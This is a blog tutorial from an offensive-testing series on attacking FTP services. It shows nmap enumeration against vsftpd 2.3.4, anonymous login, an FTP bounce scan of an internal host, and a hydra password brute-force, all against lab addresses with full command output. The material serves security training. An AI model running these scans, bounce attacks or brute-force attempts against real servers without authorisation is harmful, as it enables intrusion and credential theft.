ATTACKING COMMONLY USED SERVICES: PART_03 Exploiting FTP

Sharing is caring
This entry is part 4 of 4 in the series Offensive Testing Enterprise Networks

Views: 52

By default, FTP service uses TCP port 21. However, it’s possible to modify the default port and run the ftp service using another TCP port.

Basic FTP Commands

CommandDescription
?/helpprint local help information
appendAppend to a file
asciiset ascii transfer type
binarySet Binary transfer type
bye/exit/quitTerminate ftp session and exit
cdChange remote working directory
chmodChange file permissions of remote file
close/disconnectTerminate FTP session
debugtoggle/set debugging mode
delete/mdelete (multiple)delete remote file
dir/lslist contents of remote directory
get/recv/mget (multiple)receive file
mkdirmake directory on remote machine
passiveenter passive transfer mode
put/mput (multiple)send one file
pwdprint working directory on remote machine
renamerename file
rmdirremove directory on remote machine
sizeshow size of remote file
typeset file transfer type
verbosetoggle verbose mode

Vulnerable FTP Settings

There are many different security-related settings we can make on each FTP server. The below settings allows anonymous login to the FTP server.

SettingDescription
anonymous_enable=YESAllowing anonymous login?
anon_upload_enable=YESAllowing anonymous to upload files?
anon_mkdir_write_enable=YESAllowing anonymous to create new directories?
no_anon_password=YESDo not ask anonymous for password?
anon_root=/home/username/ftpDirectory for anonymous.
write_enable=YESAllow the usage of FTP commands: STOR, DELE, RNFR, RNTO, MKD, RMD, APPE, and SITE?
vsFTPd

Enumeration

Nmap – FTP Scripts

In KALI Linux, all the NSE scripts are located in the folder /usr/share/nmap/scripts/.

Finding nmap scripts,

#Update nmap scripts
C:\home\zybersec> sudo nmap --script-updatedb
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-27 13:29 CEST
NSE: Updating rule database.
NSE: Script Database updated successfully.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.77 seconds
                                                                
#find nmap scripts for ftp service
C:\home\zybersec> find / -type f -name ftp* 2>/dev/null | grep scripts
/usr/share/nmap/scripts/ftp-syst.nse
/usr/share/nmap/scripts/ftp-brute.nse
/usr/share/nmap/scripts/ftp-bounce.nse
/usr/share/nmap/scripts/ftp-proftpd-backdoor.nse
/usr/share/nmap/scripts/ftp-anon.nse
/usr/share/nmap/scripts/ftp-vuln-cve2010-4221.nse
/usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse
/usr/share/nmap/scripts/ftp-libopie.nse                                          
Expand

Nmap default scripts -sC includes the ftp-anon Nmap script which checks if a FTP server allows anonymous logins. The version enumeration flag -sV provides interesting information about FTP services, such as the FTP banner, which often includes the version name.

FTP – nmap enumeration 01
# nmap enumeration 
C:\home\zybersec> sudo nmap -sC -sV -p 21 192.168.152.133
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-27 12:57 CEST
Nmap scan report for 192.168.152.133
Host is up (0.00049s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.152.130
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
MAC Address: 00:0C:29:76:48:04 (VMware)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.09 seconds
Expand
FTP – nmap enumeration 02
sudo nmap -sC -sV -A -T4 -p 21 10.129.103.157
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-27 12:39 BST
Nmap scan report for 10.129.103.157
Host is up (0.0027s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp
| fingerprint-strings: 
|   GenericLines: 
|     220 InFreight FTP v1.1
|     Invalid command: try being more creative
|_    Invalid command: try being more creative
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--   1 ftpuser  ftpuser        39 Nov  8  2021 flag.txt
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.93%I=7%D=4/27%Time=644A5EF7%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,74,"220\x20InFreight\x20FTP\x20v1\.1\r\n500\x20Invalid\x20comm
SF:and:\x20try\x20being\x20more\x20creative\r\n500\x20Invalid\x20command:\
SF:x20try\x20being\x20more\x20creative\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 21/tcp)
HOP RTT     ADDRESS
1   2.60 ms 10.10.14.1
2   2.56 ms 10.129.103.157

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.99 seconds
Expand

Anonymous Login

One of these authentication mechanisms is the anonymous user. This is often used to allow everyone on the internal network to share files and data without accessing each other’s computers.

From the nmap scan, it seems that the anonymous login is accepted by the target FTP server. To access with anonymous login, we can use the anonymous username and no password.

# anonymous login
└──╼ $ftp 10.129.103.157
Connected to 10.129.103.157.
220 InFreight FTP v1.1
Name (10.129.103.157:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 ftpuser  ftpuser        39 Nov  8  2021 flag.txt
226 Transfer complete
ftp> 

FTP login using Openssl

It looks slightly different if the FTP server runs with TLS/SSL encryption. Because then we need a client that can handle TLS/SSL. For this, we can use the client openssl and communicate with the FTP server. The good thing about using openssl is that we can see the SSL certificate, which can also be helpful.

Connect using openssl
# FTP server runs with TLS/SSL encryption
openssl s_client -connect 192.168.152.133:21 -starttls ftp

CONNECTED(00000003)                                                                                      
Can't use SSL_get_servername                        
depth=0 C = BEUS, ST = California, L = Sacramento, O = nlabs, OU = Dev, CN = master.nlabs.local, emailAddress = [email protected]
verify error:num=18:self signed certificate
verify return:1

depth=0 C = US, ST = California, L = Sacramento, O = nlabs, OU = Dev, CN = master.nlabs.local, emailAddress = [email protected]
verify return:1
---                                                 
Certificate chain
 0 s:C = US, ST = California, L = Sacramento, O = nlabs, OU = Dev, CN = master.nlabs.local, emailAddress = [email protected]
 
 i:C = US, ST = California, L = Sacramento, O = nlabs, OU = Dev, CN = master.nlabs.local, emailAddress = [email protected]
---
 
Server certificate

-----BEGIN CERTIFICATE-----

MIIENTCCAx2gAwIBAgIUD+SlFZAWzX5yLs2q3ZcfdsRQqMYwDQYJKoZIhvcNAQEL
...SNIP...
Expand

Service Interaction

# Interacting with FTP service
C:\home\zybersec> nc -nv 192.168.152.133 21
(UNKNOWN) [192.168.152.133] 21 (ftp) open
220 (vsFTPd 2.3.4)

C:\home\zybersec> telnet 192.168.152.133 21
Trying 192.168.152.133...
Connected to 192.168.152.133.
Escape character is '^]'.
220 (vsFTPd 2.3.4)

# Enumerate FTP
cat /etc/vsftpd.conf | grep -v "#"
cat /etc/ftpusers
ftp> status
ls 
cd
ls -R
ftp> get path\to\file.txt
ls | grep files.txt
wget -m --no-passive ftp://anonymous:[email protected] #download all available files
touch testupload.txt #upload a file
put testupload.txt #upload a file
Expand

FTP Bounce Attacks

An FTP bounce attack is a network attack that uses FTP servers to deliver outbound traffic to another device on the network. The attacker uses a PORT command to trick the FTP connection into running commands and getting information from a device other than the intended server.

Consider we are targetting an FTP Server FTP_DMZ exposed to the internet. Another device within the same network, Internal_DMZ, is not exposed to the internet. We can use the connection to the FTP_DMZ server to scan Internal_DMZ using the FTP Bounce attack and obtain information about the server’s open ports. Then, we can use that information as part of our attack against the infrastructure.

Modern FTP servers include protections that, by default, prevent this type of attack, but if these features are misconfigured in modern-day FTP servers, the server can become vulnerable to an FTP Bounce attack.

# FTP Bounce attack
nmap -Pn -v -n -p80 -b anonymous:[email protected] 172.17.0.2

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-27 04:55 EDT
Resolved FTP bounce attack proxy to 10.10.110.213 (10.10.110.213).
Attempting connection to ftp://anonymous:[email protected]:21
Connected:220 (vsFTPd 3.0.3)
Login credentials accepted by FTP server!
Initiating Bounce Scan at 04:55
FTP command misalignment detected ... correcting.
Completed Bounce Scan at 04:55, 0.54s elapsed (1 total ports)
Nmap scan report for 172.17.0.2
Host is up.

PORT   STATE  SERVICE
80/tcp open http

<SNIP>
Expand

Brute Force FTP

# HYDRA brute-force attack
hydra -f -l robin -P passwords.txt 10.129.1.122 ftp -s 2121
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-28 10:28:00
[DATA] max 16 tasks per 1 server, overall 16 tasks, 250 login tries (l:1/p:250), ~16 tries per task
[DATA] attacking ftp://10.129.1.122:2121/
[2121][ftp] host: 10.129.1.122   login: robin   password: 7ixxxxxxxxxxx
[STATUS] attack finished for 10.129.1.122 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-28 10:28:47
Series Navigation<< Web Attacks